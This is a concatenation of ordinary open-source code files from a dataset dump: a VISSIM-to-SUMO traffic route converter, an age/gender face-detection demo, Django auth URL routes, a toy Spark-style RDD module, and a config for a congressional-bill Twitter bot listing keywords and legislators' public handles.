VISSIM vehicle type data\n :rtype: dict of dict\n \"\"\"\n veh_type_d = dict()\n for veh_type in xmldoc.getElementsByTagName('vehicleType'):\n type_d = {\n 'id': veh_type.getAttribute('no'),\n 'length': length_d[veh_type.getAttribute('model2D3DDistr')],\n 'acc': acc_d[veh_type.getAttribute('maxAccelFunc')],\n }\n veh_type_d[veh_type.getAttribute('no')] = type_d\n return veh_type_d\n\n\n# FIXME: not necessarily nicely done\ndef gen_verbinder_map(xmldoc):\n \"\"\"produce dict with boolean values to check if a given link is a verbinder\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of VISSIM link id -> bool flag if link is 'Verbinder'\n :rtype: dict\n \"\"\"\n # simple implementation by static variable; xmldoc arg is in the way\n # if not hasattr(gen_verbinder_map, \"v_dic\"):\n # gen_verbinder_map.v_dic = dict() # doesn't exist yet, so initialize\n is_verbinder_d = dict()\n for link in xmldoc.getElementsByTagName(\"link\"):\n if len(link.getElementsByTagName(\"fromLinkEndPt\")) > 0:\n is_verbinder_d[link.getAttribute(\"no\")] = True\n else:\n is_verbinder_d[link.getAttribute(\"no\")] = False\n # returning a dict...\n return is_verbinder_d\n\n\ndef parse_routes(xmldoc, edge_id_list, verbinder_d):\n \"\"\"parses the VISSIM route information of statically defined routes ONLY\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :param edge_id_list: the name says it all; SUMO edge ids\n :param verbinder_d: bool(verbinder status) of VISSIM link id\n :type verbinder_d: dict\n :return: routes by VISSIM start link id, with respective destination routes\n :rtype: dict\n\n .. note:: time frames are converted from [ms] -> [s]\n .. todo:: extend for non-static routes\n \"\"\"\n # create a list of just the split vissim edges (marked by ending char ']')\n split_edge_list = [e for e in edge_id_list if e[-1] == ']']\n rts_by_start_d = dict() # dictionary[start_link] = list()\n # loop over all routing decisions\n for decision in xmldoc.getElementsByTagName('vehicleRoutingDecisionStatic'):\n start_link = decision.getAttribute('link')\n rts_by_start_d[start_link] = []\n for vehRtStatic in decision.getElementsByTagName('vehicleRouteStatic'):\n route_d = {\n \"start_link\": start_link, # VISSIM id\n \"dest_link\": vehRtStatic.getAttribute('destLink'), # VISSIM id\n \"r_id\": vehRtStatic.getAttribute('no'),\n \"rel_flow\": [],\n \"links\": [start_link, ] # finally translated to SUMO ids\n }\n # split into separate time intervals' relative flow data\n for tIrFlow in map(str.strip, str(vehRtStatic.getAttribute('relFlow')).split(',')):\n if len(tIrFlow) == 0:\n continue\n temp = tIrFlow.split() # get \"id\", \"tInterval:relFlow\"\n try:\n tIrFlow = map(float, temp[1].split(':')) # grab [tInterval, relFlow]\n except TypeError:\n print('- WARNING - incomplete relative flow definition in inpx\\n',\n decision.toxml())\n route_d[\"rel_flow\"].append(list(tIrFlow))\n tIrFlow = np.array(route_d[\"rel_flow\"])\n if len(tIrFlow) > 0:\n tIrFlow[:, 0] /= 1000 # VISSIM time intervals [ms]->[s]\n route_d[\"rel_flow\"] = tIrFlow\n else:\n # create something.. 0 rows, 2 cols\n # NOTE: better None, but takes some adaption work\n route_d[\"rel_flow\"] = np.empty((0, 2), dtype=\"f\")\n\n # get all the intermediary links in their sumo representation\n for link in vehRtStatic.getElementsByTagName('intObjectRef'):\n link_key = link.getAttribute('key')\n if verbinder_d[link_key]:\n # exclude VISSIM connectors (usually id > 10k)\n continue\n # collect them all in VISSIM scheme first, then replace them\n route_d[\"links\"].append(link_key)\n route_d[\"links\"].append(route_d[\"dest_link\"])\n\n # translate to sumo edge ids\n sumo_links = []\n for link_key in route_d[\"links\"]:\n if link_key in edge_id_list:\n # key is found unmodified in edge_id_list\n sumo_links.append(link_key)\n else:\n # extension list *IS* ordered by its splitting sequence as generated\n sumo_links.extend(e for e in split_edge_list\n if e.startswith(link_key + '['))\n # update with sumo ids info\n route_d[\"links\"] = sumo_links\n\n # add route object to dictionary\n rts_by_start_d[start_link].append(route_d)\n return rts_by_start_d\n\n\ndef calc_route_probability(routes_by_start_d, flow_d):\n \"\"\"computes the route probabilies\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n \"\"\"\n for start_link, sl_routes in routes_by_start_d.items():\n if start_link not in flow_d:\n # we got no in-flow data for that route's start link\n print('- skipping probability calc\\n',\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n continue\n # set 0 vectors for all time frames\n absolute_flow = flow_d[start_link][\"flow\"][:, 1]\n veh_comp = flow_d[start_link][\"vehComp\"]\n # time frames must have the same limits as flows, as checked before\n # therefor all route flows for 1 start link must also have same limits\n # get all the startlink-route rel.flows-by-time-window lined up\n sl_rt_relF = np.stack([rt['rel_flow'] for rt in sl_routes])\n # all summed rel.flows by timeframe\n # sl_sum_relF = sl_rt_relF.sum(axis=0)[:, 1:] # keep shape (n x timeframes)\n sl_sum_relF = sl_rt_relF.sum(axis=0)[:, 1] # shape (timeframes, )\n for route in routes_by_start_d[start_link]:\n # set the vehicle type for each route\n route[\"type\"] = veh_comp\n route[\"probability\"] = np.zeros_like(absolute_flow)\n # get a selector for all summed up flows > 0 (= relevant)\n comp_flow_sel = sl_sum_relF > 0.\n route[\"probability\"][comp_flow_sel] = \\\n (route[\"rel_flow\"][comp_flow_sel, 1] / sl_sum_relF[comp_flow_sel])\n\n\ndef validate_rel_flow(routes_by_start_d, flow_d):\n \"\"\"checks if a relative flow is missing and completes it if necessary\n essentially fixing a VISSIM inp -> inpx conversion bug\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n\n .. note:: *modifies* routes_by_start_d\n \"\"\"\n # VISSIM BUG!!: Relative Zuflüsse mit dem Wert 1.0 gehen bei der\n # Konversion von .inp zu .inpx verloren\n\n # compare all rel_flows with the reference flow\n # get all time frame limits from all routes\n # np.concatenate([rt['rel_flow'] for rtl in routes_by_start_d.values() for rt in rtl])\n for start_link, sl_routes in routes_by_start_d.items():\n if start_link not in flow_d:\n # should we remove the routes entry ?\n print('- skipping flow validation\\n'\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n # CHECK: is this ok with later steps ?\n continue\n # grab all the time window starts from the flows\n # NOTE: need slice here due to redundant veh_comp col.\n ref_time_shape = flow_d.get(start_link)[\"flow\"][:, :2]\n ref_time_shape[:, 1] = 1. # set to default (VISSIM inp-> inpx BUG)\n for route in sl_routes:\n # check if there is a relative flow def. at all\n if len(route[\"rel_flow\"]) == 0:\n # if not, append default\n route[\"rel_flow\"] = ref_time_shape.copy()\n continue\n else:\n # check if the time frame starts are the same\n assert np.array_equal(ref_time_shape[:, 0], route[\"rel_flow\"][:, 0]),\\\n \"\\nPROBLEM: flow count and relative flow time frames are not aligned\\n\\t\"\\\n \"for VISSIM start link id: \" + start_link\n # copy back modifications\n routes_by_start_d[start_link] = sl_routes\n\n\ndef create_vTypeDistribution_elems(veh_comp_d, veh_type_d, speed_d, root):\n \"\"\"append the vehicle distribution data to the given dom document\n :param veh_comp_d:\n :type veh_comp_d: dict\n :param veh_type_d:\n :type veh_type_d: dict\n :param speed_d:\n :type speed_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n # iterate vehicle compositions\n for c_id, comps in veh_comp_d.items():\n v_type_dist = root.ownerDocument.createElement(\"vTypeDistribution\")\n v_type_dist.setAttribute(\"id\", c_id)\n root.appendChild(v_type_dist)\n for comp in comps:\n v_type = root.ownerDocument.createElement(\"vType\")\n v_type.setAttribute(\n \"id\",\n \"t{}_D{}\".format(\n veh_type_d[comp[\"vehType\"]][\"id\"],\n c_id))\n v_type.setAttribute(\"accel\", veh_type_d[comp[\"vehType\"]][\"acc\"])\n v_type.setAttribute(\"length\",\n veh_type_d[comp[\"vehType\"]][\"length\"])\n v_type.setAttribute(\"probability\", comp[\"rel_flow\"])\n v_type.setAttribute(\"maxSpeed\", speed_d[comp[\"desSpeedDistr\"]])\n v_type_dist.appendChild(v_type)\n # return route_doc\n\n\ndef create_routeDistribution_elems(routes_by_start_d, root):\n \"\"\"append the route distribution data into the given dom document\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n # iterating by VISSIM link id\n for start_link in routes_by_start_d:\n if start_link not in flow_d:\n # no flow, no go\n print('- skipping route dist. gen\\n'\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n continue\n if len(routes_by_start_d[start_link]) == 0:\n continue\n ref_time = flow_d[start_link][\"flow\"][:, 0]\n for ic, time in enumerate(ref_time):\n route_dist = root.ownerDocument.createElement(\"routeDistribution\")\n # just a name\n route_dist.setAttribute(\"id\", \"_\".join([start_link,\n str(time)]))\n for route in routes_by_start_d[start_link]:\n if np.abs(route[\"probability\"][ic]) != 0:\n route_node = root.ownerDocument.createElement(\"route\")\n route_node.setAttribute(\"id\", route[\"r_id\"])\n route_node.setAttribute(\"edges\",\n \" \".join(route[\"links\"]))\n route_node.setAttribute(\"probability\",\n str(np.abs(\n route[\"probability\"][ic])))\n route_dist.appendChild(route_node)\n if route_dist.hasChildNodes():\n root.appendChild(route_dist)\n # return route_doc\n\n\ndef create_flow_elems(routes_by_start_d, flow_d, root):\n \"\"\"append the flow data to the given dom document\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n sim_end = inpx_doc.getElementsByTagName(\"simulation\")[0].getAttribute(\"simPeriod\")\n dom_flow_l = []\n for start_link in routes_by_start_d:\n if start_link not in flow_d:\n # we got no in-flow data for that route's start link\n print('- skipping flow gen\\n'\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n continue\n if len(routes_by_start_d[start_link]) == 0:\n print('- found no routes by start link:', start_link)\n continue\n flows = flow_d[start_link][\"flow\"]\n # iterate over all the time frame starts from the flows\n ref_time = flows[:, 0]\n for index, time in enumerate(ref_time):\n in_flow = [fl for fl in flow_d[start_link][\"flow\"] if\n fl[0] == time][0]\n if in_flow[1] > 0:\n flow = root.ownerDocument.createElement(\"flow\")\n flow.setAttribute(\"id\", \"fl{}_st{}\".format(start_link,\n time))\n flow.setAttribute(\"color\", \"1,1,0\")\n flow.setAttribute(\"begin\", str(time))\n if index < len(ref_time) - 1 and len(ref_time) > 1:\n flow.setAttribute(\"end\",\n str(time + ref_time[index + 1]))\n else:\n flow.setAttribute(\"end\", sim_end)\n flow.setAttribute(\"vehsPerHour\", str(in_flow[1]))\n flow.setAttribute(\"type\", str(int(in_flow[2])))\n flow.setAttribute('route', \"_\".join([start_link,\n str(time)]))\n dom_flow_l.append(flow)\n dom_flow_l = sorted(dom_flow_l,\n key=lambda dom: float(dom.getAttribute(\"begin\")))\n for dom_obj in dom_flow_l:\n root.appendChild(dom_obj)\n # return route_doc\n\n\n# MAIN\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='road network conversion utility for static route flows'\n ' (VISSIM.inpx to SUMO); generates SUMO routes definition file from'\n ' given inpx and derived (by netconvert) SUMO net.')\n parser.add_argument('--output-file', '-o', default='routes.rou.xml',\n help='output file name (default: %(default)s)')\n parser.add_argument('--vissim-file', '-V', dest=\"vissim_file\", required=True,\n help='VISSIM inpx file path')\n parser.add_argument('--sumo-net-file', '-n', dest=\"sumo_net_file\", required=True,\n help='SUMO net file path')\n args = parser.parse_args()\n # print(\"\\n\", args, \"\\n\")\n\n #\n # Input data ##########\n #\n print('\\n---\\n\\n* loading VISSIM net:\\n\\t', args.vissim_file)\n inpx_doc = minidom.parse(args.vissim_file)\n print('\\n---\\n\\n* loading SUMO net:\\n\\t', args.sumo_net_file,)\n sumo_doc = minidom.parse(args.sumo_net_file)\n\n print('+ building edge list...')\n # for all normal edges\n sumo_edge_ids = [edge.getAttribute(\"id\") for edge in\n sumo_doc.getElementsByTagName('edge')\n if not edge.hasAttribute(\"function\")]\n print('\\tOK.')\n\n print('+ building \"Verbinder\"(\"connector\") info...')\n # to check if a link is a verbinder\n verbinder_flag = gen_verbinder_map(inpx_doc)\n print('\\tOK.')\n\n print('\\n---')\n #\n # Vehicle Speeds, distributions, types ##########\n #\n print('* parsing speeds...')\n # parse vehicle type data\n speed_d = parse_speed_avg(inpx_doc)\n print('* parsing vehicle distributions...')\n # get the vehicle distribution\n vehicle_comp_d = parse_veh_comp(inpx_doc)\n print('* parsing vehicle types...')\n # parse vehTypes and combine the information with acceleration and length data\n vehicle_type_d = parse_vehicle_types(inpx_doc, parse_max_acc(inpx_doc),\n parse_length(inpx_doc))\n print('OK.\\n---')\n\n #\n # Flows and Routes ##########\n #\n # TODO: maybe make flows and routes conversion switchable by option ?\n print('* parsing vehicle in-flow definitions...')\n # parse flows\n flow_d = parse_flows(inpx_doc)\n print('* parsing vehicle routes...')\n # parse routes\n routes_by_start_d = parse_routes(inpx_doc, sumo_edge_ids, verbinder_flag)\n print('+ validating relative flows...')\n # validate relative flows\n validate_rel_flow(routes_by_start_d, flow_d)\n print('+ setting route branching probabilities...')\n # computes the probability for each route\n calc_route_probability(routes_by_start_d, flow_d)\n print('OK.\\n---')\n\n #\n # XML generation ##########\n #\n print('* output routes generation...')\n # create dom document and define routes + flows\n result_doc = Document()\n routes_Elem = result_doc.createElement(\"routes\")\n result_doc.appendChild(routes_Elem)\n\n create_vTypeDistribution_elems(vehicle_comp_d, vehicle_type_d, speed_d, routes_Elem)\n print('-' * 3)\n create_routeDistribution_elems(routes_by_start_d, routes_Elem)\n print('-' * 3)\n create_flow_elems(routes_by_start_d, flow_d, routes_Elem)\n print('OK.\\n---')\n\n print('* wrinting output:')\n # write the data into a .rou.xml file\n out_Fn = args.output_file\n if not out_Fn.endswith('.xml'):\n out_Fn += '.xml'\n with open(out_Fn, \"w\") as ofh:\n result_doc.writexml(ofh, addindent=' ', newl='\\n')\n ofh.close()\n print('. data written to:\\n\\t', out_Fn)\n","repo_name":"ngctnnnn/DRL_Traffic-Signal-Control","sub_path":"sumo-rl/sumo/tools/import/vissim/convert_vissimXML_flows_statRoutes.py","file_name":"convert_vissimXML_flows_statRoutes.py","file_ext":"py","file_size_in_byte":23322,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"24520252595","text":"import logging\n\nimport cv2\nimport dlib\nimport numpy as np\nfrom PIL import Image\n\nfrom src.factory import setup_model\n\n# for face detection\ndetector = dlib.get_frontal_face_detector()\n\n# load model and weights\nmodel, img_size = setup_model()\n\n\ndef draw_label(image, point, label, font=cv2.FONT_HERSHEY_SIMPLEX, font_scale=0.8, thickness=1):\n size = cv2.getTextSize(label, font, font_scale, thickness)[0]\n x, y = point\n cv2.rectangle(image, (x, y - size[1]), (x + size[0], y), (255, 0, 0), cv2.FILLED)\n cv2.putText(\n image, label, point, font, font_scale, (255, 255, 255), thickness, lineType=cv2.LINE_AA\n )\n\n\ndef convert_pil_2_cv2(img: Image.Image) -> np.array:\n return cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n\n\ndef convert_cv2_2_pil(img: np.array) -> Image.Image:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return Image.fromarray(img)\n\n\ndef resize_image(img: np.array) -> np.array:\n h, w, _ = img.shape\n r = 640 / max(w, h)\n return cv2.resize(img, (int(w * r), int(h * r)))\n\n\ndef detect_age_gender(img: Image.Image) -> Image.Image:\n margin = 0.4\n\n img = convert_pil_2_cv2(img)\n img = resize_image(img)\n # dlib needs image in rgb format\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_h, img_w, _ = np.shape(img_rgb)\n\n # detect faces using dlib detector\n detected = detector(img_rgb, 1)\n faces = np.empty((len(detected), img_size, img_size, 3))\n logging.info(f\"# faces: {len(detected)}\")\n if len(detected) > 0:\n for i, d in enumerate(detected):\n x1, y1, x2, y2, w, h = (\n d.left(),\n d.top(),\n d.right() + 1,\n d.bottom() + 1,\n d.width(),\n d.height(),\n )\n xw1 = max(int(x1 - margin * w), 0)\n yw1 = max(int(y1 - margin * h), 0)\n xw2 = min(int(x2 + margin * w), img_w - 1)\n yw2 = min(int(y2 + margin * h), img_h - 1)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\n # cv2.rectangle(img, (xw1, yw1), (xw2, yw2), (255, 0, 0), 2)\n faces[i] = cv2.resize(img[yw1 : yw2 + 1, xw1 : xw2 + 1], (img_size, img_size))\n\n # predict ages and genders of the detected faces\n results = model.predict(faces)\n predicted_genders = results[0]\n ages = np.arange(0, 101).reshape(101, 1)\n predicted_ages = results[1].dot(ages).flatten()\n # draw results\n for i, d in enumerate(detected):\n label = \"{}, {}\".format(\n int(predicted_ages[i]), \"M\" if predicted_genders[i][0] < 0.5 else \"F\"\n )\n draw_label(img, (d.left(), d.top()), label)\n logging.info(f\"label {i}: {label}\")\n return convert_cv2_2_pil(img)\n","repo_name":"dfds-data/computer-vision-tni-2021","sub_path":"src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13458579973","text":"from rest_framework import routers\nfrom django.urls import path\nfrom .views import (\n Register,\n ObtainTokenPairView,\n UserViewSet,\n LogoutAndBlacklistRefreshTokenForUserView\n)\n\nrouter = routers.DefaultRouter()\nrouter.register('user', UserViewSet, basename='user')\n\nurlpatterns = router.urls\nurlpatterns.append(path('login/', ObtainTokenPairView.as_view(), name='login'))\nurlpatterns.append(path('register/', Register.as_view(), name='register'))\nurlpatterns.append(path('logout/', LogoutAndBlacklistRefreshTokenForUserView.as_view(), name='blacklist'))\n","repo_name":"shadmaan4f93/consequence","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44038015729","text":"\nimport json\nimport pickle\nimport StringIO\nimport sys\nimport zerorpc\nimport gevent\nfrom termcolor import colored\nimport cloudpickle\nimport logging\nimport string\nimport re\n\nlogging.basicConfig()\n\nclass RDD(object):\n def __init__(self):\n pass\n \n\n def collectToDic(self, p):\n elements = {}\n while True:\n element = self.get(p)\n if element == None:\n break\n # print element\n elements.update(element)\n # print '-----'\n # print elements\n # print '-----'\n return elements\n\n def collect(self, p):\n elements = []\n while True:\n element = self.get(p)\n if element == None:\n break\n # print element\n elements.append(element)\n # print '-----'\n # print elements\n # print '-----'\n return elements\n\n def count(self, p):\n return len(self.collect(p))\n\n def reduce(self, func):\n pass\n\n def save(self, p):\n \n if p != 10:\n \n stringWriteToFile = {}\n while True:\n\n temp = self.get(p)\n if temp == None:\n break\n stringWriteToFile.update(temp)\n\n return stringWriteToFile\n \n \n\nclass TextFile(RDD):\n\n def __init__(self, filename):\n self.filename = filename\n self.lines = None\n self.index = 0\n\n def get(self, p): \n start = p['start']\n end = p['end'] \n\n lines = open(self.filename, 'r').read()[start:end]\n # print 'lines:%s' %lines\n self.lines = lines.strip().split('\\n')\n \n if self.index == len(self.lines):\n self.index = 0\n return None\n \n else:\n line = self.lines[self.index]\n # line = re.sub('[!@#$,.\\\"\\']', '', line)\n \n self.index += 1\n # print 'line: %s' %line\n return line\n\n\nclass FlatMap(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n # print 'flat map'\n element = self.parent.get(p)\n # print '~~!~~~!~~'\n # print element\n # print colored('------', 'red')\n # print 'run flat map'\n # print p\n # print self.get(p)\n # print colored('------', 'red')\n if element == None:\n return None\n else:\n # print type(element)\n element_new = self.func(element)\n # print 'flat map result: %s' % element_new\n return element_new\n\nclass Map(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n # print 'mapping!'\n elements = self.parent.get(p)\n # print '~~!~~~!~~~!~~!~~~'\n # print elements\n # print colored('------', 'red')\n # print 'run map'\n # print p\n # print self.get(p)\n # print colored('------', 'red')\n\n # print elements\n if elements == None:\n return None\n else:\n elements_new = []\n for element in elements:\n a = self.func(element)\n # print 'self func element: %s' % a\n elements_new.append(a)\n # print 'map result: % s' % elements_new\n return elements_new\n\nclass MapValues(RDD):\n\n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n elements = self.parent.get(p)\n # print elements\n if elements == None:\n return None\n else:\n for k, v in elements.iteritems():\n v = self.func(v)\n return elements\n\nclass Filter(RDD):\n \n def __init__(self, parent, func):\n self.parent = parent\n self.func = func\n\n def get(self, p):\n while True:\n element = self.parent.get(p)\n # print 'test'\n # print p\n if element == None:\n return None\n else:\n if self.func(element):\n return element\n\n\nclass GroupByKey(RDD):\n def __init__(self, parent):\n self.parent = parent\n # self.func = func\n self.new_element = {}\n def get(self, p):\n element = self.parent.get(p)\n if element == None:\n self.new_element = {}\n return None\n else:\n # print element\n for k in element:\n if k in self.new_element:\n self.new_element[k].append(element[k])\n else:\n self.new_element[k] = [element[k]]\n return self.new_element\n\nclass ReduceByKey(RDD):\n\n def __init__(self, parent, func):\n super(ReduceByKey, self).__init__()\n self.parent = parent\n self.func = func\n self.new_element = {}\n\n def get(self, p):\n element = self.parent.get(p)\n if element == None:\n self.new_element = {}\n return None\n else:\n for k, v in element:\n # print 'k%s'% k\n # print 'k%s'% v\n if k in self.new_element:\n self.new_element[k] = self.func(self.new_element[k], v)\n else:\n self.new_element[k] = v\n # print 'reduce by key result new_element: %s' % self.new_element\n return self.new_element\n\n# class Join(RDD, inMap):\n# def __init__(self, parent):\n# super(Join, self).__init__()\n# self.parent = parent\n# self.new_element = {}\n\n# def get(self, p):\n# element = self.parent.get(p)\n# if element\n\n\n\n\n\n\n\n","repo_name":"michellegao715/MicroSpark","sub_path":"rdd.py","file_name":"rdd.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28474426234","text":"__version__ = '0.1'\n\n\"\"\"\nAnnoying stopgap: Twitter reserves some space for their t.co 'shortened' links.\nThat's 23-24 characters. Just going for a safe upper bound here. See:\n https://github.com/bear/python-twitter/issues/265\n https://github.com/bear/python-twitter/issues/457\n\"\"\"\nTWEET_MAX_LENGTH = 116 # 140 - 24 \nSLEEP_LIMIT = 8\n\nKEYWORDS = ['cyber',\n 'hacking',\n 'hacker',\n 'hacked',\n 'breach',\n 'privacy',\n 'Internet',\n 'broadband',\n 'crypto',\n 'net neutrality',\n 'communications',\n 'fcc']\n #'hack',\n #'leak',\n #'nsa',\n #'data',\n #'technology',\n #'digital',\n #'security']\n\nCONGRESS = '115'\nROOT_URL = 'https://www.gpo.gov/fdsys/'\nBULK_PATH = 'bulkdata/BILLSTATUS/'\nBASE_URL = ROOT_URL + BULK_PATH + CONGRESS\n\nSENATE_URL = BASE_URL + '/s/'\nSRES_URL = BASE_URL + '/sres/'\nSJRES_URL = BASE_URL + '/sjres/'\nSCONRES_URL = BASE_URL + '/sconres/'\nHOUSE_URL = BASE_URL + '/hr/'\nHRES_URL = BASE_URL + '/hres/'\nHJRES_URL = BASE_URL + '/hjres/'\nHCONRES_URL = BASE_URL + '/hconres/'\n\nURL_LIST = [SENATE_URL,\n SRES_URL,\n SJRES_URL,\n SCONRES_URL,\n HOUSE_URL,\n HRES_URL,\n HJRES_URL,\n HCONRES_URL]\n\nCONGRESS_URL = 'https://www.congress.gov/bill/'\nBILL_TYPES_PATH = {'S': 'senate-bill',\n 'SRES': 'senate-resolution',\n 'SJRES': 'senate-joint-resolution',\n 'SCONRES': 'senate-concurrent-resolution',\n 'HR': 'house-bill',\n 'HRES': 'house-resolution',\n 'HJRES': 'house-joint-resolution',\n 'HCONRES': 'house-concurrent-resolution'}\n\nCONGRESS_TWITTER = {\n 'Brown, Sherrod': '@SenSherrodBrown',\n 'Cantwell, Maria': '@SenatorCantwell',\n 'Cardin, Benjamin': '@SenatorCardin',\n 'Carper, Thomas': '@SenatorCarper',\n 'Casey, Robert': '@SenBobCasey',\n 'Corker, Bob': '@SenBobCorker',\n 'Feinstein, Dianne': '@SenFeinstein',\n 'Hatch, Orrin': '@SenOrrinHatch',\n 'Klobuchar, Amy': '@amyklobuchar _',\n 'McCaskill, Claire': '@McCaskillOffice',\n 'Menendez, Robert': '@SenatorMenendez',\n 'Nelson, Bill': '@SenBillNelson',\n 'Sanders, Bernard': '@SenSanders',\n 'Stabenow, Debbie': '@SenStabenow',\n 'Tester, Jon': '@SenatorTester',\n 'Whitehouse, Sheldon': '@SenWhitehouse',\n 'Barrasso, John': '@SenJohnBarrasso',\n 'Wicker, Roger': '@SenatorWicker',\n 'Alexander, Lamar': '@SenAlexander',\n 'Cochran, Thad': '@SenThadCochran',\n 'Collins, Susan': '@SenatorCollins',\n 'Cornyn, John': '@JohnCornyn',\n 'Durbin, Richard': '@SenatorDurbin',\n 'Enzi, Michael': '@SenatorEnzi',\n 'Graham, Lindsey': '@GrahamBlog',\n 'Inhofe, James': '@InhofePress',\n 'McConnell, Mitch': '@McConnellPress',\n 'Merkley, Jeff': '@SenJeffMerkley',\n 'Reed, John': '@SenJackReed',\n 'Risch, James': '@SenatorRisch',\n 'Roberts, Pat': '@SenPatRoberts',\n 'Shaheen, Jeanne': '@SenatorShaheen',\n 'Udall, Tom': '@SenatorTomUdall',\n 'Warner, Mark': '@MarkWarner',\n 'Gillibrand, Kirsten': '@SenGillibrand',\n 'Franken, Alan': '@SenFranken',\n 'Coons, Chris': '@SenCoonsOffice',\n 'Manchin, Joe': '@Sen_JoeManchin',\n 'Aderholt, Robert': '@Robert_Aderholt',\n 'Amash, Justin': '@justinamash',\n 'Baldwin, Tammy': '@SenatorBaldwin',\n 'Barletta, Lou': '@RepLouBarletta',\n 'Barton, Joe': '@RepJoeBarton',\n 'Bass, Karen': '@RepKarenBass',\n 'Bennet, Michael': '@SenBennetCo',\n 'Bilirakis, Gus': '@RepGusBilirakis',\n 'Bishop, Rob': '@RepRobBishop',\n 'Bishop, Sanford': '@SanfordBishop',\n 'Black, Diane': '@RepDianeBlack',\n 'Blackburn, Marsha': '@MarshaBlackburn',\n 'Blumenauer, Earl': '@BlumenauerMedia',\n 'Blumenthal, Richard': '@SenBlumenthal',\n 'Blunt, Roy': '@RoyBlunt',\n 'Boozman, John': '@JohnBoozman',\n 'Bordallo, Madeleine': None,\n 'Brady, Kevin': '@RepKevinBrady',\n 'Brady, Robert': '@RepBrady',\n 'Brooks, Mo': '@RepMoBrooks',\n 'Buchanan, Vern': '@VernBuchanan',\n 'Bucshon, Larry': '@RepLarryBucshon',\n 'Burgess, Michael': '@MichaelCBurgess',\n 'Burr, Richard': '@SenatorBurr',\n 'Butterfield, George': '@GKButterfield',\n 'Calvert, Ken': '@KenCalvert',\n 'Capito, Shelley': '@SenCapito',\n 'Capuano, Michael': '@RepMikeCapuano',\n 'Carson, Andre': '@RepAndreCarson',\n 'Carter, John': '@JudgeCarter',\n 'Cassidy, Bill': '@BillCassidy',\n 'Castor, Kathy': '@USRepKCastor',\n 'Chabot, Steve': '@RepSteveChabot',\n 'Chaffetz, Jason': '@JasonInTheHouse',\n 'Chu, Judy': '@RepJudyChu',\n 'Cicilline, David': '@RepCicilline',\n 'Clarke, Yvette': '@RepYvetteClarke',\n 'Clay, Wm.': None,\n 'Cleaver, Emanuel': '@RepCleaver',\n 'Clyburn, James': '@Clyburn',\n 'Coffman, Mike': '@RepMikeCoffman',\n 'Cohen, Steve': '@RepCohen',\n 'Cole, Tom': '@TomColeOK04',\n 'Conaway, K.': '@ConawayTX11',\n 'Connolly, Gerald': '@GerryConnolly',\n 'Conyers, John': '@RepJohnConyers',\n 'Cooper, Jim': '@RepJimCooper',\n 'Costa, Jim': '@RepJimCosta',\n 'Courtney, Joe': '@RepJoeCourtney',\n 'Crapo, Michael': '@MikeCrapo',\n 'Crawford, Eric': '@RepRickCrawford',\n 'Crowley, Joseph': '@RepJoeCrowley',\n 'Cuellar, Henry': '@RepCuellar',\n 'Culberson, John': '@CongCulberson',\n 'Cummings, Elijah': '@RepCummings',\n 'Davis, Danny': '@RepDannyDavis',\n 'Davis, Susan': '@RepSusanDavis',\n 'DeFazio, Peter': '@RepPeterDeFazio',\n 'DeGette, Diana': '@RepDianaDeGette',\n 'DeLauro, Rosa': '@RosaDeLauro',\n 'Denham, Jeff': '@RepJeffDenham',\n 'Dent, Charles': '@RepCharlieDent',\n 'DesJarlais, Scott': '@DesJarlaisTN04',\n 'Deutch, Theodore': '@RepTedDeutch',\n 'Diaz-Balart, Mario': '@MarioDB',\n 'Doggett, Lloyd': '@RepLloydDoggett',\n 'Donnelly, Joe': '@SenDonnelly',\n 'Doyle, Michael': '@USRepMikeDoyle',\n 'Duffy, Sean': '@RepSeanDuffy',\n 'Duncan, Jeff': '@RepJeffDuncan',\n 'Duncan, John': '@RepJohnDuncanJr',\n 'Ellison, Keith': '@KeithEllison',\n 'Engel, Eliot': '@RepEliotEngel',\n 'Eshoo, Anna': '@RepAnnaEshoo',\n 'Farenthold, Blake': '@Farenthold',\n 'Flake, Jeff': '@JeffFlake',\n 'Fleischmann, Charles': '@RepChuck',\n 'Flores, Bill': '@RepBillFlores',\n 'Fortenberry, Jeff': '@JeffFortenberry',\n 'Foxx, Virginia': '@VirginiaFoxx',\n 'Franks, Trent': '@RepTrentFranks',\n 'Frelinghuysen, Rodney': '@USRepRodney',\n 'Fudge, Marcia': '@RepMarciaFudge',\n 'Garamendi, John': '@RepGaramendi',\n 